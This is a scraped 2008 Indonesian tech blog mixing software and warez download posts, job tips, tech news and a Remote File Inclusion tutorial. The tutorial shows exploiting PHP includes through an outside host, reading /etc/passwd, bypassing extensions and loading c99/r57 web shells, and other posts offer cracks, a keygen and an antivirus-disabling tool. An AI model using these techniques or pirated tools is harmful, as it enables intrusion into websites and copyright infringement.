FlashGet Skins
Cat Sleep
Lightning Bolt 1
Lightning Bolt 2
Mercedes CLK
Mercedes E Class
Porshe GT
Water Yubo
Also include FlashGet Skin Designer
FlashGet 100 Max Download Jobs Hack
FlashGet Hack (Get Up To 30 Jets) v1.0
FlashGet v1.71 (Hack)
FlashGet v1.73 (Patch)
FlashGit v1.59
FlashGet (JetCar) v1.73 (Build 128)
FlashGet v1.90.1012
Kamis, 22 Mei 2008
Rabu, 21 Mei 2008
Terobosan Baru Dalam Sistem Aplikasi Web
Purefect adalah desktop environment yang berjalan 100% di atas web browser. Purefect mengadopsi teknologi RIA (Rich Internet Application). Dengan Purefect, aplikasi web tidak lagi berbentuk halaman-halaman web yang selama ini kita ketahui, tapi berbentuk aplikasi-aplikasi window seperti layaknya aplikasi yang berjalan pada komputer desktop kita.
Purefect berusaha untuk mengkombinasikan kelebihan dari sistem GUI pada desktop dengan kelebihan dari sistem web. Seluruh aplikasi dalam sistem Purefect berjalan di atas web browser dan dibangun dengan berbasiskan teknologi Web 2.0 dan AJAX (Asynchronous JavaScript and XML) yang akan mempermudah penggunaan dan pengaturan aplikasi.
Beberapa keuntungan dari Purefect adalah:
Mempermudah dan mempercepat pembangunan aplikasi web secara signifikan
Aplikasi yang dibangun bersifat multi-platform
Untuk menjalankan aplikasi berbasis Purefect yang dibutuhkan hanyalah web browser tanpa diperlukan plug-in atau software tambahan lainnya (ActiveX, Java, dsb)
Berbasis object oriented
Arsitektur lengkap: login system, personalized desktop, manajemen user, advanced windowing system, task management, dsb
Komponen-komponen dasar dari Purefect telah selesai dibangun. Fokus development saat ini adalah menambahkan berbagai komponen pendukung yang dapat mempermudah developer. Setelah komponen-komponen tersebut selesai, Klorofil akan segera merelease Purefect kepada komunitas open source.
Untuk melihat perkembangan terakhir development project Purefect tersebut, Anda dapat melihat screenshot dari Purefect di website Klorofil.
Purefect berusaha untuk mengkombinasikan kelebihan dari sistem GUI pada desktop dengan kelebihan dari sistem web. Seluruh aplikasi dalam sistem Purefect berjalan di atas web browser dan dibangun dengan berbasiskan teknologi Web 2.0 dan AJAX (Asynchronous JavaScript and XML) yang akan mempermudah penggunaan dan pengaturan aplikasi.
Beberapa keuntungan dari Purefect adalah:
Mempermudah dan mempercepat pembangunan aplikasi web secara signifikan
Aplikasi yang dibangun bersifat multi-platform
Untuk menjalankan aplikasi berbasis Purefect yang dibutuhkan hanyalah web browser tanpa diperlukan plug-in atau software tambahan lainnya (ActiveX, Java, dsb)
Berbasis object oriented
Arsitektur lengkap: login system, personalized desktop, manajemen user, advanced windowing system, task management, dsb
Komponen-komponen dasar dari Purefect telah selesai dibangun. Fokus development saat ini adalah menambahkan berbagai komponen pendukung yang dapat mempermudah developer. Setelah komponen-komponen tersebut selesai, Klorofil akan segera merelease Purefect kepada komunitas open source.
Untuk melihat perkembangan terakhir development project Purefect tersebut, Anda dapat melihat screenshot dari Purefect di website Klorofil.
IT Jobs for Indonesian 1st Graduate…
Jika kita mengecek lowongan IT yang disebar via milis, web job
recruitment, jasa ketenagakerjaan kampus ataupun di koran pasti banyak
mencantumkan syarat yang berat-berat seperti contoh iklan di bawah ini.
Padahal jujur aja, range gaji yang ditawarkan tidak sebanding dengan
ilmu yang dipunyai oleh calon karyawannya.
Untuk itu bagi rekan-rekan yang dari jurusan ybs (misalnya TIN, ITK, TEP
dan bahkan ILKOM) yang pengetahuan programmingnya sedikit, tetapi kuat
di logika pemrograman.
Kalimat² yang perlu dicermati dalam lowongan IT di antaranya:
” Menguasai bahasa pemrograman:
„ÏMicrosoft Visual Studio (Microsoft Visual Basic)
„ÏMicrosoft Visual Studio NET (Windows Application, ASP, Net..”
Untuk junior programming susah sekali dapat dikatakan bahwa mereka sudah
menguasai program VB.NET, di Jakarta sendiri ada beberapa Microsoft
certified Partner yang khusus menjual sertifikasi programmer dan itu
tidak murah.
“…5.Menguasai dan memahami SQL, Server, Oracle database…”
Sehingga jika ada perusahaan yang menawarkan lowongan seperti ini, kita
sudah dapat menebak bahwa perusahaan tersebut skalanya kecil (hanya
software house) dan kita akan diberi lot pekerjaan yang berat.
Strateginya, jangan berharap perusahaan tersebut memberi kita sallary
yang gede tetapi kita juga jangan terlalu fokus ke requirement mereka
yang sangat berat & njelimet.. (harus bisa SQL server tapi bisa Oracle
Artinya: jika kita mau ngelamar ke perush. Tsb, PEDE AJAH! Gak usah
takut gak advance dalam pemrograman, toh ujung-ujungnya kita cuman
disuruh belajar oleh mereka.
Bagaimana strateginya agar diterima?
- cantumkan dalam CV Anda project apa saja yang sudah Anda kerjakan
walalupun itu proyek gratisan dan di bawah 1 juta rupiah. Misalnya saya
dulu pernah membuat dbase local pake Ms.Access di INDOFOOD. Bila perlu
program yang Anda buat tersebut di-Burn di CD lalu ditempeli sticker
logo ysb.
- tunjukkan bahwa Anda tekun dan suka begadang, di mana pun pekerja IT
itu hampir sama dengan sales, yaitu gak mengenal waktu kerja kantoran,
atau bahasa kerennya: “Longtime work hour”
Mungkin masih banyak yang dijadiin tips, tapi sebagai 1st graduate mah
jangan kebanyakan bertheory, kirim aja lowongan sebanyak-banyaknya ke
semua perusahaan. INGAT: bahwa lamaran adalah INVESTASI bagi orang yang
bekerja terutama di perusahaan swasta.
recruitment, jasa ketenagakerjaan kampus ataupun di koran pasti banyak
mencantumkan syarat yang berat-berat seperti contoh iklan di bawah ini.
Padahal jujur aja, range gaji yang ditawarkan tidak sebanding dengan
ilmu yang dipunyai oleh calon karyawannya.
Untuk itu bagi rekan-rekan yang dari jurusan ybs (misalnya TIN, ITK, TEP
dan bahkan ILKOM) yang pengetahuan programmingnya sedikit, tetapi kuat
di logika pemrograman.
Kalimat² yang perlu dicermati dalam lowongan IT di antaranya:
” Menguasai bahasa pemrograman:
„ÏMicrosoft Visual Studio (Microsoft Visual Basic)
„ÏMicrosoft Visual Studio NET (Windows Application, ASP, Net..”
Untuk junior programming susah sekali dapat dikatakan bahwa mereka sudah
menguasai program VB.NET, di Jakarta sendiri ada beberapa Microsoft
certified Partner yang khusus menjual sertifikasi programmer dan itu
tidak murah.
“…5.Menguasai dan memahami SQL, Server, Oracle database…”
Sehingga jika ada perusahaan yang menawarkan lowongan seperti ini, kita
sudah dapat menebak bahwa perusahaan tersebut skalanya kecil (hanya
software house) dan kita akan diberi lot pekerjaan yang berat.
Strateginya, jangan berharap perusahaan tersebut memberi kita sallary
yang gede tetapi kita juga jangan terlalu fokus ke requirement mereka
yang sangat berat & njelimet.. (harus bisa SQL server tapi bisa Oracle
Artinya: jika kita mau ngelamar ke perush. Tsb, PEDE AJAH! Gak usah
takut gak advance dalam pemrograman, toh ujung-ujungnya kita cuman
disuruh belajar oleh mereka.
Bagaimana strateginya agar diterima?
- cantumkan dalam CV Anda project apa saja yang sudah Anda kerjakan
walalupun itu proyek gratisan dan di bawah 1 juta rupiah. Misalnya saya
dulu pernah membuat dbase local pake Ms.Access di INDOFOOD. Bila perlu
program yang Anda buat tersebut di-Burn di CD lalu ditempeli sticker
logo ysb.
- tunjukkan bahwa Anda tekun dan suka begadang, di mana pun pekerja IT
itu hampir sama dengan sales, yaitu gak mengenal waktu kerja kantoran,
atau bahasa kerennya: “Longtime work hour”
Mungkin masih banyak yang dijadiin tips, tapi sebagai 1st graduate mah
jangan kebanyakan bertheory, kirim aja lowongan sebanyak-banyaknya ke
semua perusahaan. INGAT: bahwa lamaran adalah INVESTASI bagi orang yang
bekerja terutama di perusahaan swasta.
Joke ? ROFL
We’ve been talking about several serious and frustating material(s) or information(s) in this blog lately; and I believe that most of it’s visitors are happy and enjoying their time reading these topics! It’s a fact that some serious infomation(s) in this blog is interesting; especially for IT people! But wait - According to BioWizard of the ScienceChatForum even Sexual Fantasies while doing Masturbation can damage your brain; why IT material(s) can’t?! Judging from that statement of the science guru, today I will try to put a little super funny joke(s) for you guys to watch! Have a look inside!
If you’re an Indonesian then you must know Indonesian Idol, and if you’re not Indonesian (and not coming from countries that apply Idol TV program) then you must know a little bit about American Idol and/or Asian Idol, right?! I hope you do, and if you don’t please refer to Google for that - Lawl!
Ok! This story is one of the most notable history of an Idol Selection(s) - Happened in Bulgarian Idol program(s)! Have a look here for the video~
Note: You really need to pay attention on it’s text and language(s) - More importantly, her statement at the very end of the video!
This “Ken Lee” person is actually having her very own fan’s site because of this video on YouTube.com; and perhaps her fan’s site is going to be a larger community compared to the real Idol of Bulgaria when the Idol is announced - Fabulous is it?! Hahaha.
For those who stayed in Indonesia and are using Indonesian ISP which still doing all the blocking thing(s) against YouTube.com - Please refer to my previous post to get to know how to bypass it, and do not forget to check on it’s very own comments! Cheers!
If you’re an Indonesian then you must know Indonesian Idol, and if you’re not Indonesian (and not coming from countries that apply Idol TV program) then you must know a little bit about American Idol and/or Asian Idol, right?! I hope you do, and if you don’t please refer to Google for that - Lawl!
Ok! This story is one of the most notable history of an Idol Selection(s) - Happened in Bulgarian Idol program(s)! Have a look here for the video~
Note: You really need to pay attention on it’s text and language(s) - More importantly, her statement at the very end of the video!
This “Ken Lee” person is actually having her very own fan’s site because of this video on YouTube.com; and perhaps her fan’s site is going to be a larger community compared to the real Idol of Bulgaria when the Idol is announced - Fabulous is it?! Hahaha.
For those who stayed in Indonesia and are using Indonesian ISP which still doing all the blocking thing(s) against YouTube.com - Please refer to my previous post to get to know how to bypass it, and do not forget to check on it’s very own comments! Cheers!
Selasa, 20 Mei 2008
The big G (Google) is too Powerfull
The Big G (Google) is currently the biggest search engine company on earth. The source here says the profit of the company itself keeps increasing. A big jump of 51% compared to 2006 and 14% compared to the last year. The numbers; their technology; their improvement on the search engine are the core factor that make the big G (Google) stays on the top of competition and currently dominating without any competitor.
Software Giant Company (Microsoft) understands that they also needs to grow, stays on the top of competition and try to compete with the big G. Source here says that Microsoft currently bids $44.6 billion for Yahoo; with an expectation that the merge of these 2 giant company can compete with the big G head-to-head in a matter of search engine.
Yahoo is still currently reviewing the offer; they have not come up with an answer yet. Some prediction of what might come next can be found here. Are they going to come up with a new name? Are they going to come up with a different layout on the internet? With a new domain name (microyohoo? yahoosoft? etc..)?
This is going to be interesting war
This article taken from ItLive Blog.
Software Giant Company (Microsoft) understands that they also needs to grow, stays on the top of competition and try to compete with the big G. Source here says that Microsoft currently bids $44.6 billion for Yahoo; with an expectation that the merge of these 2 giant company can compete with the big G head-to-head in a matter of search engine.
Yahoo is still currently reviewing the offer; they have not come up with an answer yet. Some prediction of what might come next can be found here. Are they going to come up with a new name? Are they going to come up with a different layout on the internet? With a new domain name (microyohoo? yahoosoft? etc..)?
This is going to be interesting war
This article taken from ItLive Blog.
Legendary Virus Programmer Group is No Longer Exist!
The legendary 29A virus programmer group is no more. According to a posting by long-time member Virusbuster on 29A’s web page there is no longer any contact between group members. Therefore, according to the posting the last remaining member decided to dissolve the group. Activities ceased in July 2007 when several members left the group and only three virus experts remained.
Anti-virus specialists assume that one reason for the group’s downfall is the now almost complete commercialisation of the malware scene, which has driven some virus authors into the arms of organised crime. Virus authors and botnet operators are increasingly being sent to prison for their activities, which doesn’t exactly make belonging to such a group more attractive - even if they are only amateurs like 29A.
29A’s demo viruses tended to be pioneering because they demonstrated the feasibility of viruses for various operating systems and technologies. The group, whose name is hexadecimal for 666, was responsible for the Cabir smart phone virus, early viruses for Windows 2000, for the 64-bit versions of Windows and for NTFS Alternate Data Streams, as well as Win32.Winux, a malware sample for Windows and Linux. Their malware never contained malicious routines and only demonstrated distribution methods and infection vectors. In its active period, the group published several online magazines with articles about virus programming. However, group member Marek “Benny” Strihavka, among others, did finish up in prison for one of the hacks.
Original Source - http://www.heise-online.co.uk/security/Legendary-virus-programmer-group-dissolved–/news/110277
Anti-virus specialists assume that one reason for the group’s downfall is the now almost complete commercialisation of the malware scene, which has driven some virus authors into the arms of organised crime. Virus authors and botnet operators are increasingly being sent to prison for their activities, which doesn’t exactly make belonging to such a group more attractive - even if they are only amateurs like 29A.
29A’s demo viruses tended to be pioneering because they demonstrated the feasibility of viruses for various operating systems and technologies. The group, whose name is hexadecimal for 666, was responsible for the Cabir smart phone virus, early viruses for Windows 2000, for the 64-bit versions of Windows and for NTFS Alternate Data Streams, as well as Win32.Winux, a malware sample for Windows and Linux. Their malware never contained malicious routines and only demonstrated distribution methods and infection vectors. In its active period, the group published several online magazines with articles about virus programming. However, group member Marek “Benny” Strihavka, among others, did finish up in prison for one of the hacks.
Original Source - http://www.heise-online.co.uk/security/Legendary-virus-programmer-group-dissolved–/news/110277
Remote File Inclusion
Remote File Inclusion, or, RFI, may sound hard, but it’s basically very easy. The title itself already explains a bit about it. You will basically include a file on a server, which is hosted on an other server. With RFI, you use an URL-based type of ‘hacking’. Of course, this will only be possible if the server supports PHP and allows Remote URL access.
Let’s make an example of a RFI. Say we have “server1.com” as vulnerable, and we have our file hosted on “server2.com”. Both server’s httpd root directories are “/var/www”. Server 1 has a vulnerability in their index.php. Server 2 contains our code which we want to include on Server 1
This is how a simple (and vulnerable) inclusion should look like, which we use as example on the index.php of Server 1:
$page = $_GET[’page’];
Now before we continue with RFI, and the file on Server 2, we will first test the code on the first server with LFI (Local File Inclusion), which is the same as RFI, only this method uses files which are hosted on the current (local) server, not a remote server. This method is often used in Linux to get “/etc/passwd” and sometimes “/etc/shadow”.
We will now create an other file on Server 1, which we will call “test.txt”. This file will only contain the following:
echo “Hello, this is a test.”;
Now we can test our inclusion on Server 1. We will include “test.txt” to see if it’s working. An inclusion looks like “index.php?page=file”, since we use “$page” and “$_GET[’page’]”. so the URL will be:
If it works, you should see the text on the page, which will be:
Hello, this is a test.
If you did not create the test.txt, or if it’s just not there, you should see the following error:
Warning: main(test.txt) [function.main]: failed to open stream: No such file or directory in
/var/www/index.php on line 1
Remember that some servers have URL access disabled. This makes it impossible to include external (or Remote) files. This means you can not use “http://” or “ftp://” in an inclusion, but sometimes you can still use LFI on those websites.
Ok, so now we know that the inclusion works. We can now create our file on Server 2. Let’s call it “include.txt”. This file will contain the following:
echo “Your RFI seems to be working.”;
Now you are ready to do your RFI. It looks like this:
That is how your final URL should be. If it works, you’ll see the text of include.txt in the page of Server 1. Which will be:
Your RFI seems to be working.
Now there’s something you should remember, and that is that some websites already have a filetype configured in their include script, such as:
$page = $_GET[’page’];
Then if you use “index.php?page=test”, it will include “test.html” on the local server. If this is the case, then your “http://server2.com/include.txt” will not work. You can bypass this by placing a question mark after your own URL, so it will be “http://server2.com/include.txt?”. Then the URL should look like: http://server1.com/index.php?page=http://server2.com/include.txt?
What this will do is include “http://server2.com/include.txt?.html”, but because of your question mark, it will forget about “.html” and will just include your URL.
However, this is not all you can do with RFI. You can also include shell scripts, such as “c99″ and “r57″. These scripts will allow you to execute commands or do lots of other things on the server.
For my own websites, I also use inclusions, but I’ve blocked the ability to use RFI. Here’s a little bit of code which can help you on your way to secure your own pages:
$page = $_GET[’page’];
if ($page==”index”) {
$page = “home”;
$filename = “./” . $page .”.php”;
if (file_exists($filename)) {
} else {
This code will first check if the file which is requested, exists. If so, it includes it. If not, it will simply include home.php.
Let’s make an example of a RFI. Say we have “server1.com” as vulnerable, and we have our file hosted on “server2.com”. Both server’s httpd root directories are “/var/www”. Server 1 has a vulnerability in their index.php. Server 2 contains our code which we want to include on Server 1
This is how a simple (and vulnerable) inclusion should look like, which we use as example on the index.php of Server 1:
$page = $_GET[’page’];
Now before we continue with RFI, and the file on Server 2, we will first test the code on the first server with LFI (Local File Inclusion), which is the same as RFI, only this method uses files which are hosted on the current (local) server, not a remote server. This method is often used in Linux to get “/etc/passwd” and sometimes “/etc/shadow”.
We will now create an other file on Server 1, which we will call “test.txt”. This file will only contain the following:
echo “Hello, this is a test.”;
Now we can test our inclusion on Server 1. We will include “test.txt” to see if it’s working. An inclusion looks like “index.php?page=file”, since we use “$page” and “$_GET[’page’]”. so the URL will be:
If it works, you should see the text on the page, which will be:
Hello, this is a test.
If you did not create the test.txt, or if it’s just not there, you should see the following error:
Warning: main(test.txt) [function.main]: failed to open stream: No such file or directory in
/var/www/index.php on line 1
Remember that some servers have URL access disabled. This makes it impossible to include external (or Remote) files. This means you can not use “http://” or “ftp://” in an inclusion, but sometimes you can still use LFI on those websites.
Ok, so now we know that the inclusion works. We can now create our file on Server 2. Let’s call it “include.txt”. This file will contain the following:
echo “Your RFI seems to be working.”;
Now you are ready to do your RFI. It looks like this:
That is how your final URL should be. If it works, you’ll see the text of include.txt in the page of Server 1. Which will be:
Your RFI seems to be working.
Now there’s something you should remember, and that is that some websites already have a filetype configured in their include script, such as:
$page = $_GET[’page’];
Then if you use “index.php?page=test”, it will include “test.html” on the local server. If this is the case, then your “http://server2.com/include.txt” will not work. You can bypass this by placing a question mark after your own URL, so it will be “http://server2.com/include.txt?”. Then the URL should look like: http://server1.com/index.php?page=http://server2.com/include.txt?
What this will do is include “http://server2.com/include.txt?.html”, but because of your question mark, it will forget about “.html” and will just include your URL.
However, this is not all you can do with RFI. You can also include shell scripts, such as “c99″ and “r57″. These scripts will allow you to execute commands or do lots of other things on the server.
For my own websites, I also use inclusions, but I’ve blocked the ability to use RFI. Here’s a little bit of code which can help you on your way to secure your own pages:
$page = $_GET[’page’];
if ($page==”index”) {
$page = “home”;
$filename = “./” . $page .”.php”;
if (file_exists($filename)) {
} else {
This code will first check if the file which is requested, exists. If so, it includes it. If not, it will simply include home.php.
Senin, 19 Mei 2008
Stardock Aquarium Desktop 2006 Elements Pack 1-3
Aquarium Desktop 2006 isn't a screen saver. It actually puts virtual fish and plants onto your desktop to swim around while you work.
Smoothly animated fish swim across your desktop in a life-like manner. Plants gently move to the current of the virtual water.
Add plants, anchors, debris, and even a treasure chest to your desktop. Options to configure type and quantity of fish, shadows, sounds, and more!
CPU-smart! Will not use CPU if fish are covered (it won't slow down your system).
It's just incredibly cool!
Download Link :
Smoothly animated fish swim across your desktop in a life-like manner. Plants gently move to the current of the virtual water.
Add plants, anchors, debris, and even a treasure chest to your desktop. Options to configure type and quantity of fish, shadows, sounds, and more!
CPU-smart! Will not use CPU if fish are covered (it won't slow down your system).
It's just incredibly cool!
Download Link :
Web Page Maker
Web Page Maker is an easy-to-use web page editor that allows you to create and upload web pages in minutes without knowing HTML. Simply drag and drop objects onto the page and position them freely in the layout. It comes with some pre-designed templates that help you to get started. It also includes ready-to-use navigation bars that can be inserted into the page. Additional features include built-in color picker, Java script library, image library and built-in FTP client. What's new: Fixed: If a shape has a border, it may not work well. Fixed: If you activate the grid in Windows Vista may cause "Cannot create file"C:Program FilesWeb Page MakerResourcewpmbg.gif. Access is denied" error message. If you have ever changed the sequence of pages, it may cause "Access is denied" error after publishing or exporting to html files. Added: An "include on" feature. Common elements such as logos, navigation buttons, copyright information can be shared by more than one page. When the information changes, it can be automatically updated on all pages. Added: The ability to import and edit an existing html page. Added: The ability to import a page from another project file. Added: The ability to rotate images. Added: The ability to resample an image according to its new size, which can provide improved clarity while decreasing the size of the graphics. Added: Rearranging feature in the drop-down list. Added: New high-quality website templates (Full version only). Fixed: If you change the sequence of the pages may cause "Access violation at address" crash bug. Fixed: Target doesn't work in conveyor belt slideshows. Fixed: When web pages are in preview mode, publishing may not work correctly. Fixed: Image library is empty when the program is installed on an NTFS format disk. Fixed: When you create more than 31 style sheets may cause "Error Importing Css Code" error message. Fixed: Borders do not abut the images on the right and bottom sides of the image in Firefox. Fixed: Copyright symbol doesn't display correctly under "Safari" browser. And minor bugs fixed.
Download Link :
Minggu, 18 Mei 2008
Adobe Photoshop CS 4 (2008)
Adobe Photoshop CS4 is a leaked version from Adobe, which is currently in Beta stage. This package includes all features plus a working keygenerator.
The Adobe® Photoshop® family of products is the ultimate playground for bringing out the best in your digital images and transforming them into anything you can imagine.
Ideal for:
Film, video, and multimedia professionals
Graphic and web designers using 3D and motion
Manufacturing professionals
Medical professionals
Architects and engineers
Scientific researchers
Download Link :
Photoshop Top Secret (Adobe Photoshop Training Course)
Download Link :
SQLite: Basisdata Alternatif untuk Situs Web Berskala Kecil
Alternatif yang saya perhatikan menarik dijadikan salah satu solusi terhadap sumber daya yang terbatas di tempat hosting adalah pemakaian SQLite sebagai pengganti MySQL.
MySQL sudah dianggap sebagai basidata untuk aplikasi Web dan tersedia di hampir semua tempat hosting, terutama yang berbasis UNIX. Dukungan dari aplikasi Web, lebih-lebih di lingkungan Open Source, selalu didahulukan. Persoalannya, pada saat jam sibuk untuk urusan internal (misalnya pada saat komputer yang digunakan untuk menjalankan server Web melakukan pekerjaan rutin harian dan mingguan), layanan MySQL kerap menjadi korban pertama yang dihentikan. Ini terasa di tempat hosting bersama (shared hosting) untuk paket ekonomis. Selain itu, sebagai konsekuensi kompleksitas fasilitas yang disediakan MySQL, ongkos melakukan query ke basisdata menjadi bertambah mahal.
Padahal yang banyak diperlukan oleh situs Web pribadi atau milik organisasi berskala kecil adalah basisdata yang bisa menangani SQL sebagai bahasa de facto query. Fasilitas lain seperti multiuser, beroperasi lewat jaringan, mendukung transaksi klien dan server, sangat jarang diperlukan oleh aplikasi Web berskala pribadi. Hampir semua dari perangkat lunak tersebut bekerja dengan satu akun terhadap basisdata (penanganan banyak pemakai dilakukan di aplikasi), berada di satu mesin dengan server basisdata dan tidak perlu, katakanlah, stored procedure.
Dengan demikian sebuah basisdata berbasis berkas (file based) seperti yang disediakan oleh SQLite sudah memadai. Basisdata yang dimaksud cukup disimpan dalam satu berkas, langsung diakses seperti halnya operasi baca-tulis berkas. Bonus yang juga menarik: untuk memindahkan sebuah basisdata ke server lain, cukup disalin satu berkas tersebut.
Dukungan yang perlu dipersiapkan adalah modul pustaka untuk SQLite. Tidak ada basisdata “meta” untuk keperluan internal seperti halnya basisdata mysql di MySQL. Setiap sebuah basisdata dibuat, sebuah berkas padanannya dihasilkan.
Di Debian GNU/Linux versi unstable (Sarge), modul SQLite dapat diinstal dengan menjalankan,
# apt-get install sqlite3
Sedangkan pustaka untuk Perl, yang saya perlukan untuk keperluan Movable Type, dipasang dengan cara,
# apt-get install libdbd-sqlite3-perl
Berdasarkan usulan Timothy Appnel, SQLite menjadi pertimbangan atraktif untuk Movable Type. Apalagi jika digunakan di komputer pribadi, yang biasanya berspek tidak setinggi server.
Hasil percobaan saya terhadap SQLite dengan instalasi Movable Type 3.16 yang baru dikeluarkan,
Impor entri #direktif, 218 entri dan 501 komentar, menghasilkan berkas untuk basisdata berukuran 1,4 MB.
Bagian “artikel terkait” di blog ini gagal dihasilkan karena kode yang digunakan memang ditulis oleh Adam Kalsey spesifik untuk MySQL.
Tempat hosting yang saya gunakan belum menyediakan pustaka untuk SQLite, sehingga selain keperluan (2) di atas, saya perlu waktu sampai mendapatkan tempat hosting yang mendukung SQLite jika ingin migrasi.
Dengan kepraktisannya, SQLite akan dipertimbangkan untuk keperluan aplikasi Web yang dijalankan — terutama — di komputer pribadi saya.
MySQL sudah dianggap sebagai basidata untuk aplikasi Web dan tersedia di hampir semua tempat hosting, terutama yang berbasis UNIX. Dukungan dari aplikasi Web, lebih-lebih di lingkungan Open Source, selalu didahulukan. Persoalannya, pada saat jam sibuk untuk urusan internal (misalnya pada saat komputer yang digunakan untuk menjalankan server Web melakukan pekerjaan rutin harian dan mingguan), layanan MySQL kerap menjadi korban pertama yang dihentikan. Ini terasa di tempat hosting bersama (shared hosting) untuk paket ekonomis. Selain itu, sebagai konsekuensi kompleksitas fasilitas yang disediakan MySQL, ongkos melakukan query ke basisdata menjadi bertambah mahal.
Padahal yang banyak diperlukan oleh situs Web pribadi atau milik organisasi berskala kecil adalah basisdata yang bisa menangani SQL sebagai bahasa de facto query. Fasilitas lain seperti multiuser, beroperasi lewat jaringan, mendukung transaksi klien dan server, sangat jarang diperlukan oleh aplikasi Web berskala pribadi. Hampir semua dari perangkat lunak tersebut bekerja dengan satu akun terhadap basisdata (penanganan banyak pemakai dilakukan di aplikasi), berada di satu mesin dengan server basisdata dan tidak perlu, katakanlah, stored procedure.
Dengan demikian sebuah basisdata berbasis berkas (file based) seperti yang disediakan oleh SQLite sudah memadai. Basisdata yang dimaksud cukup disimpan dalam satu berkas, langsung diakses seperti halnya operasi baca-tulis berkas. Bonus yang juga menarik: untuk memindahkan sebuah basisdata ke server lain, cukup disalin satu berkas tersebut.
Dukungan yang perlu dipersiapkan adalah modul pustaka untuk SQLite. Tidak ada basisdata “meta” untuk keperluan internal seperti halnya basisdata mysql di MySQL. Setiap sebuah basisdata dibuat, sebuah berkas padanannya dihasilkan.
Di Debian GNU/Linux versi unstable (Sarge), modul SQLite dapat diinstal dengan menjalankan,
# apt-get install sqlite3
Sedangkan pustaka untuk Perl, yang saya perlukan untuk keperluan Movable Type, dipasang dengan cara,
# apt-get install libdbd-sqlite3-perl
Berdasarkan usulan Timothy Appnel, SQLite menjadi pertimbangan atraktif untuk Movable Type. Apalagi jika digunakan di komputer pribadi, yang biasanya berspek tidak setinggi server.
Hasil percobaan saya terhadap SQLite dengan instalasi Movable Type 3.16 yang baru dikeluarkan,
Impor entri #direktif, 218 entri dan 501 komentar, menghasilkan berkas untuk basisdata berukuran 1,4 MB.
Bagian “artikel terkait” di blog ini gagal dihasilkan karena kode yang digunakan memang ditulis oleh Adam Kalsey spesifik untuk MySQL.
Tempat hosting yang saya gunakan belum menyediakan pustaka untuk SQLite, sehingga selain keperluan (2) di atas, saya perlu waktu sampai mendapatkan tempat hosting yang mendukung SQLite jika ingin migrasi.
Dengan kepraktisannya, SQLite akan dipertimbangkan untuk keperluan aplikasi Web yang dijalankan — terutama — di komputer pribadi saya.
Never Back Down (2008)
At his new high school, a rebellious teen is lured into an underground fight club, where he finds a mentor in a mixed martial arts veteran.
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Password: Super-Warez.com
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Good Luck Chuck (DVDRips)
In order to keep the woman of his dreams from falling for another guy, Charlie Logan has to break the curse that has made him wildly popular with single women: Sleep with Charlie once, and the next man you meet will be your true love.
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Password: megauploadforum.lolco.net
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(French) http://www.mininova.org/tor/1095699
P.S I Love You (2008)
A young widow discovers that her late husband has left her 10 messages intended to help ease her pain and start a new life.
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Sabtu, 17 Mei 2008
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How To Scavenge a Mouse for Parts
Old computer mice are being abandoned in droves. They're tossed out because of dirt, obsolescence, or for being entirely too beige. Anyone who has a computer usually has more than one mouse and you can get them for pennies, if not free just for asking. Fortunately for the discriminating (read: cheap) hacker, these little widgets are chock-full of project parts. Today's How-To will dissect a computer mouse, extract the useful parts, and give some ideas about how to use them.
Here we have a standard PS2 mouse; a USB mouse will look pretty much the same. We'll talk about optical mice later on.
Lets open it up. First, take out the mouse ball. Then there will be one or more screws on the bottom side that need to come out. Screws are sometimes hidden under the rubber pads.
How To Hack WiFi Password ??
Cara nya gmn ?? Gampang~
Download tutorial film di bawah ini : http://rapidshare.com/files/115561471/Hack_Protected_WIFI.rar.html
Nontonnya pake flv.player yah ^_^!
Download tutorial film di bawah ini : http://rapidshare.com/files/115561471/Hack_Protected_WIFI.rar.html
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Bagaimana cara mengetahui Mac Address di Linux Anda ??
- Memakai Root User seperti Command Prompt pada Windows Anda
- Ketikkan "ipconfig -a" tanpa tanda kutip
- Dari display yang keluar, temukan kata eth0 (eth0 merupakan default dari Ethernet Adapter)
- Temukan angka di HWaddr. Itulah Mac Address di Linux Anda :)
*Mac Address akan tampil di layar Anda seperti : 00:08:C7:1B:8C:02.
Example "ifconfig -a" output :
eth0 Link encap:Ethernet HWaddr 00:08:C7:1B:8C:02
inet addr: Bcast: Mask:
- Memakai Root User seperti Command Prompt pada Windows Anda
- Ketikkan "ipconfig -a" tanpa tanda kutip
- Dari display yang keluar, temukan kata eth0 (eth0 merupakan default dari Ethernet Adapter)
- Temukan angka di HWaddr. Itulah Mac Address di Linux Anda :)
*Mac Address akan tampil di layar Anda seperti : 00:08:C7:1B:8C:02.
Example "ifconfig -a" output :
eth0 Link encap:Ethernet HWaddr 00:08:C7:1B:8C:02
inet addr: Bcast: Mask:
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Windows Live Messenger 9.0
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Pengertian Shell dalam Komputer
Shell, dalam komputer adalah salah satu jenis program bawaan sistem operasi (seringnya merupakan program yang terpisah dari inti sistem operasi) yang menyediakan komunikasi langsung antara pengguna dan sistem operasi. Contoh dari shell adalah COMMAND.COM dalam MS-DOS, Macintosh Finder (Macintosh), Windows Explorer, Command Prompt/cmd.exe, PowerShell dalam Microsoft Windows, Bourne shell, C shell, Korn shell dan masih banyak lainnya khususnya dalam keluarga sistem operasi UNIX. Beberapa shell juga dapat digunakan untuk melakukan manajemen berkas.
Jumat, 16 Mei 2008
xHacker Pro 3.0
Exterminator : That is a completely new way to totally STOP or UNINSTALL any antivirus or firewall software.
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Cara matiin autorun buat flashdisk :D
Cara 1 : Tekan Shift (Tahan) kemudian colokkan flash disk anda.
Cara 2 : HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoDriveTypeAutoRun
isi value nya menjadi 95 ato 255 (untuk semua removable disk) :)
Cara 2 : HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoDriveTypeAutoRun
isi value nya menjadi 95 ato 255 (untuk semua removable disk) :)
Hack Password Admin Windows XP - Worked !!
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10.000 Full Programs and Cracks
Matikan Anti Virus terlebih dahulu jika ingin menggunakan Tools Cracks..
Bikin Web Proxy Sendiri :)
Apa aja si yg di perlukan untuk membuat web proxy sendiri ??
1. Script
Googling dengan menggunakan keyword : phpproxy script, atau cgi proxy script.
Atau anda bisa mendownload nya di bawah ini :
2. Hosting
Carilah free web hosting (Database is not required)
3. Internet Connection
1. Script
Googling dengan menggunakan keyword : phpproxy script, atau cgi proxy script.
Atau anda bisa mendownload nya di bawah ini :
2. Hosting
Carilah free web hosting (Database is not required)
3. Internet Connection
Setelah tersambung dengan internet, segera register ke free hosting.. Kemudian upload file script yang telah anda download tadi. SELESAI - Enjoy!!
Hacker Not Cracker
Hacker Not Cracker!
